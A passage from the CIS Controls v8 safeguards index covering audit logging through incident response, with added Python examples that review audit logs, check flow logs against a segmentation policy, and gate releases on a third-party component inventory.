Perform automated vulnerability scans of internal enterprise assets on a quarterly, or more frequent, basis. Conduct both authenticated and unauthenticated scans, using a SCAP-compliant vulnerability scanning tool.

7.6 Perform Automated Vulnerability Scans of Externally-Exposed Enterprise Assets (Applications; Identify; IG2, IG3)
Perform automated vulnerability scans of externally-exposed enterprise assets using a SCAP-compliant vulnerability scanning tool. Perform scans on a monthly, or more frequent, basis.

7.7 Remediate Detected Vulnerabilities (Applications; Respond; IG2, IG3)
Remediate detected vulnerabilities in software through processes and tooling on a monthly, or more frequent, basis, based on the remediation process.

08 Audit Log Management


Collect, alert, review, and retain audit logs of events that could help detect, understand, or recover from an attack.

ASSET TYPE SECURITY FUNCTION IG1 IG2 IG3

8.1 Establish and Maintain an Audit Log Management Process Network -Protect- •••
Establish and maintain an audit log management process that defines the enterprise’s logging requirements. At a minimum, address the collection, review, and retention of audit logs for enterprise assets. Review and update documentation annually, or when significant enterprise changes occur that could impact this Safeguard.

8.2 Collect Audit Logs Network -Detect- •••
Collect audit logs. Ensure that logging, per the enterprise’s audit log management process, has been enabled across enterprise assets.

8.3 Ensure Adequate Audit Log Storage Network -Protect- •••
Ensure that logging destinations maintain adequate storage to comply with the enterprise’s audit log management process.

8.4 Standardize Time Synchronization Network -Protect- ••
Standardize time synchronization. Configure at least two synchronized time sources across enterprise assets, where supported.

8.5 Collect Detailed Audit Logs Network -Detect- ••
Configure detailed audit logging for enterprise assets containing sensitive data. Include event source, date, username, timestamp, source addresses, destination addresses, and other useful elements that could assist in a forensic investigation.

8.6 Collect DNS Query Audit Logs Network -Detect- ••
Collect DNS query audit logs on enterprise assets, where appropriate and supported.

8.7 Collect URL Request Audit Logs Network -Detect- ••
Collect URL request audit logs on enterprise assets, where appropriate and supported.

8.8 Collect Command-Line Audit Logs Devices -Detect- ••
Collect command-line audit logs. Example implementations include collecting audit logs from PowerShell®, BASH™, and remote administrative terminals.

8.9 Centralize Audit Logs Network -Detect- ••
Centralize, to the extent possible, audit log collection and retention across enterprise assets.

8.10 Retain Audit Logs Network -Protect- ••
Retain audit logs across enterprise assets for a minimum of 90 days.

8.11 Conduct Audit Log Reviews Network -Detect- ••
Conduct reviews of audit logs to detect anomalies or abnormal events that could indicate a potential threat. Conduct reviews on a weekly, or more frequent, basis.

8.12 Collect Service Provider Logs Data -Detect- •
Collect service provider logs, where supported. Example implementations include collecting authentication and authorization events, data creation and disposal events, and user management events.

CIS Controls v8 Appendix B: Controls and Safeguards Index Page B12
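The checks that Safeguards 8.5, 8.10 and 8.11 call for, as an added worked example that is not part of the CIS document: the field names, thresholds and log records below are constructed for illustration, and the retention check only measures how much history the log store actually holds, not whether a retention setting is configured.

```python
"""Added example for Safeguards 8.5, 8.10 and 8.11 (not CIS text): check collected
audit-log records for field completeness, retention depth and logon anomalies."""
import json
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Field names are our own choice; 8.5 only names the kinds of elements to include.
REQUIRED_FIELDS = ("event_source", "timestamp", "username", "src_addr", "dst_addr", "event")
RETENTION_DAYS = 90                      # Safeguard 8.10 minimum
FAILED_LOGON_THRESHOLD = 5               # review threshold chosen for this example
REVIEW_WINDOW = timedelta(minutes=10)
REVIEW_TIME = datetime(2024, 3, 1, 12, 0, tzinfo=timezone.utc)   # "now" for the example

# Constructed sample records (one JSON object per line), as a central log store might hold them.
SAMPLE_LOGS = "\n".join([
    '{"event_source": "fileserver01", "timestamp": "2023-12-01T09:00:00Z", "username": "alice", "src_addr": "10.1.1.20", "dst_addr": "10.1.5.10", "event": "logon_success"}',
    '{"event_source": "fileserver01", "timestamp": "2024-03-01T08:00:00Z", "username": "alice", "src_addr": "10.1.1.20", "dst_addr": "10.1.5.10", "event": "file_read"}',
    '{"event_source": "vpn-gw", "timestamp": "2024-03-01T02:10:00Z", "username": "bob", "src_addr": "198.51.100.7", "event": "logon_failure"}',
    '{"event_source": "vpn-gw", "timestamp": "2024-03-01T02:10:07Z", "username": "bob", "src_addr": "198.51.100.7", "dst_addr": "10.1.0.2", "event": "logon_failure"}',
    '{"event_source": "vpn-gw", "timestamp": "2024-03-01T02:10:15Z", "username": "bob", "src_addr": "198.51.100.7", "dst_addr": "10.1.0.2", "event": "logon_failure"}',
    '{"event_source": "vpn-gw", "timestamp": "2024-03-01T02:10:22Z", "username": "bob", "src_addr": "198.51.100.7", "dst_addr": "10.1.0.2", "event": "logon_failure"}',
    '{"event_source": "vpn-gw", "timestamp": "2024-03-01T02:10:30Z", "username": "bob", "src_addr": "198.51.100.7", "dst_addr": "10.1.0.2", "event": "logon_failure"}',
    '{"event_source": "vpn-gw", "timestamp": "2024-03-01T02:10:41Z", "username": "bob", "src_addr": "198.51.100.7", "dst_addr": "10.1.0.2", "event": "logon_failure"}',
    '{"event_source": "vpn-gw", "timestamp": "2024-03-01T02:11:00Z", "username": "bob", "src_addr": "198.51.100.7", "dst_addr": "10.1.0.2", "event": "logon_success"}',
])


def parse_logs(text):
    """Parse JSON-per-line records; keep the parsed timestamp under '_ts'."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        rec["_ts"] = datetime.fromisoformat(rec["timestamp"].replace("Z", "+00:00"))
        records.append(rec)
    return records


def missing_fields(records):
    """8.5: map record index -> the required fields that record lacks."""
    return {i: [f for f in REQUIRED_FIELDS if f not in rec]
            for i, rec in enumerate(records)
            if any(f not in rec for f in REQUIRED_FIELDS)}


def retention_days_covered(records, now):
    """8.10: how many days of history the store actually holds."""
    oldest = min(rec["_ts"] for rec in records)
    return (now - oldest).days


def review_failed_logons(records, threshold=FAILED_LOGON_THRESHOLD, window=REVIEW_WINDOW):
    """8.11: (username, src_addr) pairs with >= threshold logon failures inside a sliding window."""
    failures = defaultdict(list)
    for rec in records:
        if rec.get("event") == "logon_failure":
            failures[(rec.get("username"), rec.get("src_addr"))].append(rec["_ts"])
    findings = []
    for (user, src), times in failures.items():
        times.sort()
        best, start = 0, 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            findings.append({"username": user, "src_addr": src, "failures": best,
                             "first": times[0].isoformat(), "last": times[-1].isoformat()})
    return findings


def run_review(text, now):
    """Run all three checks and return a summary a reviewer could act on."""
    records = parse_logs(text)
    days = retention_days_covered(records, now)
    return {"incomplete_records": missing_fields(records),
            "retention_days": days,
            "retention_ok": days >= RETENTION_DAYS,
            "failed_logon_findings": review_failed_logons(records)}


if __name__ == "__main__":
    print(json.dumps(run_review(SAMPLE_LOGS, REVIEW_TIME), indent=2, default=str))
```

Run against the sample, the review reports one record that lacks a destination address (the collector for that source is not meeting 8.5), 91 days of history (meets the 8.10 floor), and one burst of six failed logons for a single account and source inside the ten-minute window, which is the kind of abnormal event a weekly 8.11 review exists to surface.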

09 Email and Web Browser Protections
Improve protections and detections of threats from email and web vectors, as these are opportunities for attackers to manipulate human behavior through direct engagement.

9.1 Ensure Use of Only Fully Supported Browsers and Email Clients Applications -Protect- •••
Ensure only fully supported browsers and email clients are allowed to execute in the enterprise, only using the latest version of browsers and email clients provided through the vendor.

9.2 Use DNS Filtering Services Network -Protect- •••
Use DNS filtering services on all enterprise assets to block access to known malicious domains.

9.3 Maintain and Enforce Network-Based URL Filters Network -Protect- ••
Enforce and update network-based URL filters to limit an enterprise asset from connecting to potentially malicious or unapproved websites. Example implementations include category-based filtering, reputation-based filtering, or through the use of block lists. Enforce filters for all enterprise assets.

9.4 Restrict Unnecessary or Unauthorized Browser and Email Client Extensions Applications -Protect- ••
Restrict, either through uninstalling or disabling, any unauthorized or unnecessary browser or email client plugins, extensions, and add-on applications.

9.5 Implement DMARC Network -Protect- ••
To lower the chance of spoofed or modified emails from valid domains, implement DMARC policy and verification, starting with implementing the Sender Policy Framework (SPF) and the DomainKeys Identified Mail (DKIM) standards.

9.6 Block Unnecessary File Types Network -Protect- ••
Block unnecessary file types attempting to enter the enterprise’s email gateway.

9.7 Deploy and Maintain Email Server Anti-Malware Protections Network -Protect- •
Deploy and maintain email server anti-malware protections, such as attachment scanning and/or sandboxing.

10 Malware Defenses
Prevent or control the installation, spread, and execution of malicious applications, code, or scripts on enterprise assets.

10.1 Deploy and Maintain Anti-Malware Software Devices -Protect- •••
Deploy and maintain anti-malware software on all enterprise assets.

10.2 Configure Automatic Anti-Malware Signature Updates Devices -Protect- •••
Configure automatic updates for anti-malware signature files on all enterprise assets.

10.3 Disable Autorun and Autoplay for Removable Media Devices -Protect- •••
Disable autorun and autoplay auto-execute functionality for removable media.

10.4 Configure Automatic Anti-Malware Scanning of Removable Media Devices -Detect- ••
Configure anti-malware software to automatically scan removable media.

10.5 Enable Anti-Exploitation Features Devices -Protect- ••
Enable anti-exploitation features on enterprise assets and software, where possible, such as Microsoft® Data Execution Prevention (DEP), Windows® Defender Exploit Guard (WDEG), or Apple® System Integrity Protection (SIP) and Gatekeeper™.

10.6 Centrally Manage Anti-Malware Software Devices -Protect- ••
Centrally manage anti-malware software.

10.7 Use Behavior-Based Anti-Malware Software Devices -Detect- ••
Use behavior-based anti-malware software.


11 Data Recovery
Establish and maintain data recovery practices sufficient to restore in-scope enterprise assets to a pre-incident and trusted state.

11.1 Establish and Maintain a Data Recovery Process Data -Recover- •••
Establish and maintain a data recovery process. In the process, address the scope of data recovery activities, recovery prioritization, and the security of backup data. Review and update documentation annually, or when significant enterprise changes occur that could impact this Safeguard.

11.2 Perform Automated Backups Data -Recover- •••
Perform automated backups of in-scope enterprise assets. Run backups weekly, or more frequently, based on the sensitivity of the data.

11.3 Protect Recovery Data Data -Protect- •••
Protect recovery data with equivalent controls to the original data. Reference encryption or data separation, based on requirements.

11.4 Establish and Maintain an Isolated Instance of Recovery Data Data -Recover- •••
Establish and maintain an isolated instance of recovery data. Example implementations include version controlling backup destinations through offline, cloud, or off-site systems or services.

11.5 Test Data Recovery Data -Recover- ••
Test backup recovery quarterly, or more frequently, for a sampling of in-scope enterprise assets.


12 Network Infrastructure Management
Establish, implement, and actively manage (track, report, correct) network devices, in order to prevent attackers from exploiting vulnerable network services and access points.

12.1 Ensure Network Infrastructure is Up-to-Date Network -Protect- •••
Ensure network infrastructure is kept up-to-date. Example implementations include running the latest stable release of software and/or using currently supported network-as-a-service (NaaS) offerings. Review software versions monthly, or more frequently, to verify software support.

12.2 Establish and Maintain a Secure Network Architecture Network -Protect- ••
Establish and maintain a secure network architecture. A secure network architecture must address segmentation, least privilege, and availability, at a minimum.

12.3 Securely Manage Network Infrastructure Network -Protect- ••
Securely manage network infrastructure. Example implementations include version-controlled infrastructure-as-code, and the use of secure network protocols, such as SSH and HTTPS.

12.4 Establish and Maintain Architecture Diagram(s) Network -Identify- ••
Establish and maintain architecture diagram(s) and/or other network system documentation. Review and update documentation annually, or when significant enterprise changes occur that could impact this Safeguard.

12.5 Centralize Network Authentication, Authorization, and Auditing (AAA) Network -Protect- ••
Centralize network AAA.

12.6 Use of Secure Network Management and Communication Protocols Network -Protect- ••
Use secure network management and communication protocols (e.g., 802.1X, Wi-Fi Protected Access 2 (WPA2) Enterprise or greater).

12.7 Ensure Remote Devices Utilize a VPN and are Connecting to an Enterprise’s AAA Infrastructure Devices -Protect- ••
Require users to authenticate to enterprise-managed VPN and authentication services prior to accessing enterprise resources on end-user devices.

12.8 Establish and Maintain Dedicated Computing Resources for All Administrative Work Devices -Protect- •
Establish and maintain dedicated computing resources, either physically or logically separated, for all administrative tasks or tasks requiring administrative access. The computing resources should be segmented from the enterprise’s primary network and not be allowed internet access.


13 Network Monitoring and Defense
Operate processes and tooling to establish and maintain comprehensive network monitoring and defense against security threats across the enterprise’s network infrastructure and user base.

13.1 Centralize Security Event Alerting Network -Detect- ••
Centralize security event alerting across enterprise assets for log correlation and analysis. Best practice implementation requires the use of a SIEM, which includes vendor-defined event correlation alerts. A log analytics platform configured with security-relevant correlation alerts also satisfies this Safeguard.

13.2 Deploy a Host-Based Intrusion Detection Solution Devices -Detect- ••
Deploy a host-based intrusion detection solution on enterprise assets, where appropriate and/or supported.

13.3 Deploy a Network Intrusion Detection Solution Network -Detect- ••
Deploy a network intrusion detection solution on enterprise assets, where appropriate. Example implementations include the use of a Network Intrusion Detection System (NIDS) or equivalent cloud service provider (CSP) service.

13.4 Perform Traffic Filtering Between Network Segments Network -Protect- ••
Perform traffic filtering between network segments, where appropriate.

13.5 Manage Access Control for Remote Assets Devices -Protect- ••
Manage access control for assets remotely connecting to enterprise resources. Determine amount of access to enterprise resources based on: up-to-date anti-malware software installed, configuration compliance with the enterprise’s secure configuration process, and ensuring the operating system and applications are up-to-date.

13.6 Collect Network Traffic Flow Logs Network -Detect- ••
Collect network traffic flow logs and/or network traffic to review and alert upon from network devices.

13.7 Deploy a Host-Based Intrusion Prevention Solution Devices -Protect- •
Deploy a host-based intrusion prevention solution on enterprise assets, where appropriate and/or supported. Example implementations include use of an Endpoint Detection and Response (EDR) client or host-based IPS agent.

13.8 Deploy a Network Intrusion Prevention Solution Network -Protect- •
Deploy a network intrusion prevention solution, where appropriate. Example implementations include the use of a Network Intrusion Prevention System (NIPS) or equivalent CSP service.

13.9 Deploy Port-Level Access Control Devices -Protect- •
Deploy port-level access control. Port-level access control utilizes 802.1x, or similar network access control protocols, such as certificates, and may incorporate user and/or device authentication.

13.10 Perform Application Layer Filtering Network -Protect- •
Perform application layer filtering. Example implementations include a filtering proxy, application layer firewall, or gateway.

13.11 Tune Security Event Alerting Thresholds Network -Detect- •
Tune security event alerting thresholds monthly, or more frequently.

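Safeguard 13.6 asks for flow logs that can be reviewed and alerted upon, and 13.4 for filtering between segments; one review that ties the two together is to replay collected flows against the intended inter-segment policy and alert on anything the filters should have stopped. The following is an added example, not part of the CIS document: the segment ranges, the allow rules and the flow records are all constructed, and the record layout (source, destination, protocol, destination port, bytes) is a simplification of what a NetFlow or cloud flow-log export carries.

```python
"""Added example for Safeguards 13.4 and 13.6 (not CIS text): review constructed flow-log
records against an inter-segment filtering policy and flag flows the policy does not allow."""
import ipaddress
from collections import Counter

# Constructed segment plan.
SEGMENTS = {
    "users":   ipaddress.ip_network("10.1.0.0/16"),
    "servers": ipaddress.ip_network("10.2.0.0/16"),
    "ot":      ipaddress.ip_network("10.9.0.0/16"),
    "admin":   ipaddress.ip_network("10.200.0.0/24"),
}

# Constructed allow list: (source segment, destination segment, destination port).
ALLOWED = {
    ("users", "servers", 443),
    ("users", "servers", 445),
    ("admin", "servers", 22),
    ("admin", "ot", 22),
}

# Constructed flow records: (src, dst, proto, dst_port, bytes).
SAMPLE_FLOWS = [
    ("10.1.4.20",  "10.2.0.10",   "tcp", 443,  120000),
    ("10.1.4.20",  "10.2.0.10",   "tcp", 445,  8000),
    ("10.1.4.21",  "10.9.0.5",    "tcp", 502,  1200),    # workstation -> OT controller
    ("10.200.0.3", "10.2.0.10",   "tcp", 22,   40000),
    ("10.1.4.22",  "10.2.0.11",   "tcp", 3389, 200),     # workstation -> server RDP
    ("10.1.4.22",  "10.1.4.23",   "tcp", 445,  500),     # intra-segment
    ("10.2.0.10",  "203.0.113.9", "tcp", 443,  9000),    # egress to the internet
]


def segment_of(addr):
    """Name of the segment containing addr, or 'external' if it is in none of them."""
    ip = ipaddress.ip_address(addr)
    for name, net in SEGMENTS.items():
        if ip in net:
            return name
    return "external"


def find_policy_violations(flows, allowed=ALLOWED):
    """Flows that cross between two internal segments without a matching allow rule."""
    violations = []
    for src, dst, proto, port, nbytes in flows:
        s, d = segment_of(src), segment_of(dst)
        if s == d or "external" in (s, d):
            continue   # intra-segment traffic and internet egress are outside this check
        if (s, d, port) not in allowed:
            violations.append({"src": src, "dst": dst, "segments": f"{s}->{d}",
                               "proto": proto, "dst_port": port, "bytes": nbytes})
    return violations


def cross_segment_matrix(flows):
    """Byte totals per (source segment, destination segment) pair: a quick review view."""
    totals = Counter()
    for src, dst, _proto, _port, nbytes in flows:
        s, d = segment_of(src), segment_of(dst)
        if s != d:
            totals[(s, d)] += nbytes
    return totals


if __name__ == "__main__":
    for v in find_policy_violations(SAMPLE_FLOWS):
        print("VIOLATION", v)
    for (s, d), total in sorted(cross_segment_matrix(SAMPLE_FLOWS).items()):
        print(f"{s:>8} -> {d:<8} {total:>8} bytes")
```

Any flow that shows up as a violation in collected logs is a filter that is missing or misconfigured on the boundary between those two segments, which is exactly what 13.4 is meant to enforce; the matrix view is the kind of summary a monthly threshold-tuning pass under 13.11 would look at.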
14 Security Awareness and Skills Training
Establish and maintain a security awareness program to influence behavior among the workforce to be security conscious and properly skilled to reduce cybersecurity risks to the enterprise.

14.1 Establish and Maintain a Security Awareness Program N/A -Protect- •••
Establish and maintain a security awareness program. The purpose of a security awareness program is to educate the enterprise’s workforce on how to interact with enterprise assets and data in a secure manner. Conduct training at hire and, at a minimum, annually. Review and update content annually, or when significant enterprise changes occur that could impact this Safeguard.

14.2 Train Workforce Members to Recognize Social Engineering Attacks N/A -Protect- •••
Train workforce members to recognize social engineering attacks, such as phishing, pre-texting, and tailgating.

14.3 Train Workforce Members on Authentication Best Practices N/A -Protect- •••
Train workforce members on authentication best practices. Example topics include MFA, password composition, and credential management.

14.4 Train Workforce on Data Handling Best Practices N/A -Protect- •••
Train workforce members on how to identify and properly store, transfer, archive, and destroy sensitive data. This also includes training workforce members on clear screen and desk best practices, such as locking their screen when they step away from their enterprise asset, erasing physical and virtual whiteboards at the end of meetings, and storing data and assets securely.

14.5 Train Workforce Members on Causes of Unintentional Data Exposure N/A -Protect- •••
Train workforce members to be aware of causes for unintentional data exposure. Example topics include mis-delivery of sensitive data, losing a portable end-user device, or publishing data to unintended audiences.

14.6 Train Workforce Members on Recognizing and Reporting Security Incidents N/A -Protect- •••
Train workforce members to be able to recognize a potential incident and be able to report such an incident.

14.7 Train Workforce on How to Identify and Report if Their Enterprise Assets are Missing Security Updates N/A -Protect- •••
Train workforce to understand how to verify and report out-of-date software patches or any failures in automated processes and tools. Part of this training should include notifying IT personnel of any failures in automated processes and tools.

14.8 Train Workforce on the Dangers of Connecting to and Transmitting Enterprise Data Over Insecure Networks N/A -Protect- •••
Train workforce members on the dangers of connecting to, and transmitting data over, insecure networks for enterprise activities. If the enterprise has remote workers, training must include guidance to ensure that all users securely configure their home network infrastructure.

14.9 Conduct Role-Specific Security Awareness and Skills Training N/A -Protect- ••
Conduct role-specific security awareness and skills training. Example implementations include secure system administration courses for IT professionals, OWASP® Top 10 vulnerability awareness and prevention training for web application developers, and advanced social engineering awareness training for high-profile roles.

15 Service Provider Management
Develop a process to evaluate service providers who hold sensitive data, or are responsible for an enterprise’s critical IT platforms or processes, to ensure these providers are protecting those platforms and data appropriately.

15.1 Establish and Maintain an Inventory of Service Providers N/A -Identify- •••
Establish and maintain an inventory of service providers. The inventory is to list all known service providers, include classification(s), and designate an enterprise contact for each service provider. Review and update the inventory annually, or when significant enterprise changes occur that could impact this Safeguard.

15.2 Establish and Maintain a Service Provider Management Policy N/A -Identify- ••
Establish and maintain a service provider management policy. Ensure the policy addresses the classification, inventory, assessment, monitoring, and decommissioning of service providers. Review and update the policy annually, or when significant enterprise changes occur that could impact this Safeguard.

15.3 Classify Service Providers N/A -Identify- ••
Classify service providers. Classification consideration may include one or more characteristics, such as data sensitivity, data volume, availability requirements, applicable regulations, inherent risk, and mitigated risk. Update and review classifications annually, or when significant enterprise changes occur that could impact this Safeguard.

15.4 Ensure Service Provider Contracts Include Security Requirements N/A -Protect- ••
Ensure service provider contracts include security requirements. Example requirements may include minimum security program requirements, security incident and/or data breach notification and response, data encryption requirements, and data disposal commitments. These security requirements must be consistent with the enterprise’s service provider management policy. Review service provider contracts annually to ensure contracts are not missing security requirements.

15.5 Assess Service Providers N/A -Identify- •
Assess service providers consistent with the enterprise’s service provider management policy. Assessment scope may vary based on classification(s), and may include review of standardized assessment reports, such as Service Organization Control 2 (SOC 2) and Payment Card Industry (PCI) Attestation of Compliance (AoC), customized questionnaires, or other appropriately rigorous processes. Reassess service providers annually, at a minimum, or with new and renewed contracts.

15.6 Monitor Service Providers Data -Detect- •
Monitor service providers consistent with the enterprise’s service provider management policy. Monitoring may include periodic reassessment of service provider compliance, monitoring service provider release notes, and dark web monitoring.

15.7 Securely Decommission Service Providers Data -Protect- •
Securely decommission service providers. Example considerations include user and service account deactivation, termination of data flows, and secure disposal of enterprise data within service provider systems.

16 Application Software Security
Manage the security life cycle of in-house developed, hosted, or acquired software to prevent, detect, and remediate security weaknesses before they can impact the enterprise.

16.1 Establish and Maintain a Secure Application Development Process Applications -Protect- ••
Establish and maintain a secure application development process. In the process, address such items as: secure application design standards, secure coding practices, developer training, vulnerability management, security of third-party code, and application security testing procedures. Review and update documentation annually, or when significant enterprise changes occur that could impact this Safeguard.

16.2 Establish and Maintain a Process to Accept and Address Software Vulnerabilities Applications -Protect- ••
Establish and maintain a process to accept and address reports of software vulnerabilities, including providing a means for external entities to report. The process is to include such items as: a vulnerability handling policy that identifies reporting process, responsible party for handling vulnerability reports, and a process for intake, assignment, remediation, and remediation testing. As part of the process, use a vulnerability tracking system that includes severity ratings, and metrics for measuring timing for identification, analysis, and remediation of vulnerabilities. Review and update documentation annually, or when significant enterprise changes occur that could impact this Safeguard. Third-party application developers need to consider this an externally-facing policy that helps to set expectations for outside stakeholders.

16.3 Perform Root Cause Analysis on Security Vulnerabilities Applications -Protect- ••
Perform root cause analysis on security vulnerabilities. When reviewing vulnerabilities, root cause analysis is the task of evaluating underlying issues that create vulnerabilities in code, and allows development teams to move beyond just fixing individual vulnerabilities as they arise.

16.4 Establish and Manage an Inventory of Third-Party Software Components Applications -Protect- ••
Establish and manage an updated inventory of third-party components used in development, often referred to as a “bill of materials,” as well as components slated for future use. This inventory is to include any risks that each third-party component could pose. Evaluate the list at least monthly to identify any changes or updates to these components, and validate that the component is still supported.

16.5 Use Up-to-Date and Trusted Third-Party Software Components Applications -Protect- ••
Use up-to-date and trusted third-party software components. When possible, choose established and proven frameworks and libraries that provide adequate security. Acquire these components from trusted sources or evaluate the software for vulnerabilities before use.

16.6 Establish and Maintain a Severity Rating System and Process for Application Vulnerabilities Applications -Protect- ••
Establish and maintain a severity rating system and process for application vulnerabilities that facilitates prioritizing the order in which discovered vulnerabilities are fixed. This process includes setting a minimum level of security acceptability for releasing code or applications. Severity ratings bring a systematic way of triaging vulnerabilities that improves risk management and helps ensure the most severe bugs are fixed first. Review and update the system and process annually.

16.7 Use Standard Hardening Configuration Templates for Application Infrastructure Applications -Protect- ••
Use standard, industry-recommended hardening configuration templates for application infrastructure components. This includes underlying servers, databases, and web servers, and applies to cloud containers, Platform as a Service (PaaS) components, and SaaS components. Do not allow in-house developed software to weaken configuration hardening.

16.8 Separate Production and Non-Production Systems Applications -Protect- ••
Maintain separate environments for production and non-production systems.

16.9 Train Developers in Application Security Concepts and Secure Coding Applications -Protect- ••
Ensure that all software development personnel receive training in writing secure code for their specific development environment and responsibilities. Training can include general security principles and application security standard practices. Conduct training at least annually and design in a way to promote security within the development team, and build a culture of security among the developers.

16.10 Apply Secure Design Principles in Application Architectures Applications -Protect- ••
Apply secure design principles in application architectures. Secure design principles include the concept of least privilege and enforcing mediation to validate every operation that the user makes, promoting the concept of “never trust user input.” Examples include ensuring that explicit error checking is performed and documented for all input, including for size, data type, and acceptable ranges or formats. Secure design also means minimizing the application infrastructure attack surface, such as turning off unprotected ports and services, removing unnecessary programs and files, and renaming or removing default accounts.

16.11 Leverage Vetted Modules or Services for Application Security Components Applications -Protect- ••
Leverage vetted modules or services for application security components, such as identity management, encryption, and auditing and logging. Using platform features in critical security functions will reduce developers’ workload and minimize the likelihood of design or implementation errors. Modern operating systems provide effective mechanisms for identification, authentication, and authorization and make those mechanisms available to applications. Use only standardized, currently accepted, and extensively reviewed encryption algorithms. Operating systems also provide mechanisms to create and maintain secure audit logs.

16.12 Implement Code-Level Security Checks Applications -Protect- •
Apply static and dynamic analysis tools within the application life cycle to verify that secure coding practices are being followed.

16.13 Conduct Application Penetration Testing Applications -Protect- •
Conduct application penetration testing. For critical applications, authenticated penetration testing is better suited to finding business logic vulnerabilities than code scanning and automated security testing. Penetration testing relies on the skill of the tester to manually manipulate an application as an authenticated and unauthenticated user.

16.14 Conduct Threat Modeling Applications -Protect- •
Conduct threat modeling. Threat modeling is the process of identifying and addressing application security design flaws within a design, before code is created. It is conducted through specially trained individuals who evaluate the application design and gauge security risks for each entry point and access level. The goal is to map out the application, architecture, and infrastructure in a structured way to understand its weaknesses.
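Safeguards 16.4 and 16.6 together describe a component inventory that is reviewed monthly for support status and a severity rating that sets a minimum bar for release. The following is an added example, not part of the CIS document, showing the two working as one review: the component names, versions, supplier names, end-of-support dates and issue identifiers are all constructed (the `EXAMPLE-` identifiers stand in for whatever advisory or tracker ids an enterprise uses), and the choice that `critical` and `high` findings block a release is this example's acceptability bar.

```python
"""Added example for Safeguards 16.4 and 16.6 (not CIS text): a minimal third-party component
inventory matched against a constructed issue list, prioritized by severity, run through a
release gate and checked for components past their support window."""
import json
from dataclasses import dataclass
from datetime import date
from typing import Optional

SEVERITY_RANK = {"critical": 4, "high": 3, "medium": 2, "low": 1}
RELEASE_BLOCKING = {"critical", "high"}       # minimum acceptability chosen for this example
REVIEW_DATE = date(2024, 3, 1)                # "today" for the monthly review


@dataclass(frozen=True)
class Component:
    name: str
    version: str
    supplier: str
    supported_until: Optional[date]           # None: no published end-of-support date


@dataclass(frozen=True)
class Issue:
    component: str
    version: str
    severity: str
    ident: str                                # placeholder identifiers, not real advisories


# Constructed bill of materials for one application.
INVENTORY = [
    Component("libfoo", "1.2.3", "Foo Project", date(2023, 6, 30)),
    Component("webfw", "4.0.1", "WebFW Org", None),
    Component("jsonlib", "2.9", "JSON Co", date(2026, 1, 1)),
]

# Constructed issue feed; the webfw entry targets a version that is not in the inventory.
KNOWN_ISSUES = [
    Issue("libfoo", "1.2.3", "high", "EXAMPLE-0001"),
    Issue("jsonlib", "2.9", "medium", "EXAMPLE-0002"),
    Issue("webfw", "3.9.0", "critical", "EXAMPLE-0003"),
]


def open_findings(inventory, issues):
    """Issues whose (component, version) exactly matches something in the inventory."""
    present = {(c.name, c.version) for c in inventory}
    return [i for i in issues if (i.component, i.version) in present]


def prioritize(findings):
    """16.6: most severe first, so the worst bug is at the top of the fix queue."""
    return sorted(findings, key=lambda i: SEVERITY_RANK.get(i.severity, 0), reverse=True)


def release_gate(findings, blocking=RELEASE_BLOCKING):
    """(ok, blockers): ok is False while any finding at a blocking severity is open."""
    blockers = [i for i in findings if i.severity in blocking]
    return (not blockers, blockers)


def unsupported_components(inventory, today):
    """16.4: components whose published support window has already closed."""
    return [c.name for c in inventory
            if c.supported_until is not None and c.supported_until < today]


def monthly_review(inventory, issues, today):
    """Everything the monthly 16.4 pass and the 16.6 release decision need, in one summary."""
    findings = prioritize(open_findings(inventory, issues))
    ok, blockers = release_gate(findings)
    return {"findings": [(i.component, i.version, i.severity, i.ident) for i in findings],
            "release_ok": ok,
            "blockers": [i.ident for i in blockers],
            "unsupported": unsupported_components(inventory, today)}


if __name__ == "__main__":
    print(json.dumps(monthly_review(INVENTORY, KNOWN_ISSUES, REVIEW_DATE), indent=2))
```

Matching on exact name and version is deliberate: a finding against a version the application does not ship is noise, while a component that is both out of support and carrying an open high-severity issue (as `libfoo` is here) is the case 16.4 and 16.6 exist to catch before it reaches production.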

17 Incident Response Management
Establish a program to develop and maintain an incident response capability (e.g., policies, plans, procedures, defined roles, training, and communications) to prepare, detect, and quickly respond to an attack.

17.1 Designate Personnel to Manage Incident Handling N/A -Respond- •••
Designate one key person, and at least one backup, who will manage the enterprise’s incident handling process. Management personnel are responsible for the coordination and documentation of incident response and recovery efforts and can consist of employees internal to the enterprise, third-party vendors, or a hybrid approach. If using a third-party vendor, designate at least one person internal to the enterprise to oversee any third-party work. Review annually, or when significant enterprise changes occur that could impact this Safeguard.

17.2 Establish and Maintain Contact Information for Reporting Security Incidents N/A -Respond- •••
Establish and maintain contact information for parties that need to be informed of security incidents. Contacts may include internal staff, third-party vendors, law enforcement, cyber insurance providers, relevant government agencies, Information Sharing and Analysis Center (ISAC) partners, or other stakeholders. Verify contacts annually to ensure that information is up-to-date.

17.3 Establish and Maintain an Enterprise Process for Reporting Incidents N/A -Respond- •••
Establish and maintain an enterprise process for the workforce to report security incidents. The process includes reporting timeframe, personnel to report to, mechanism for reporting, and the minimum information to be reported. Ensure the process is publicly available to all of the workforce. Review annually, or when significant enterprise changes occur that could impact this Safeguard.

17.4 Establish and Maintain an Incident Response Process N/A -Respond- ••
Establish and maintain an incident response process that addresses roles and responsibilities, compliance requirements, and a communication plan. Review annually, or when significant enterprise changes occur that could impact this Safeguard.

17.5 Assign Key Roles and Responsibilities N/A -Respond- ••
Assign key roles and responsibilities for incident response, including staff from legal, IT, information security, facilities, public relations, human resources, incident responders, and analysts, as applicable. Review annually, or when significant enterprise changes occur that could impact this Safeguard.

17.6 Define Mechanisms for Communicating During Incident Response N/A -Respond- ••
Determine which primary and secondary mechanisms will be used to communicate and report during a security incident. Mechanisms can include phone calls, emails, or letters. Keep in mind that certain mechanisms, such as emails, can be affected during a security incident. Review annually, or when significant enterprise changes occur that could impact this Safeguard.

17.7 Conduct Routine Incident Response Exercises N/A -Recover- ••
Plan and conduct routine incident response exercises and scenarios for key personnel involved in the incident response process to prepare for responding to real-world incidents. Exercises need to test communication channels, decision making, and workflows. Conduct testing on an annual basis, at a minimum.

17.8 Conduct Post-Incident Reviews N/A -Recover- ••
Conduct post-incident reviews. Post-incident reviews help prevent incident recurrence through identifying lessons learned and follow-up action.

17.9 Establish and Maintain Security Incident Thresholds N/A -Recover- •
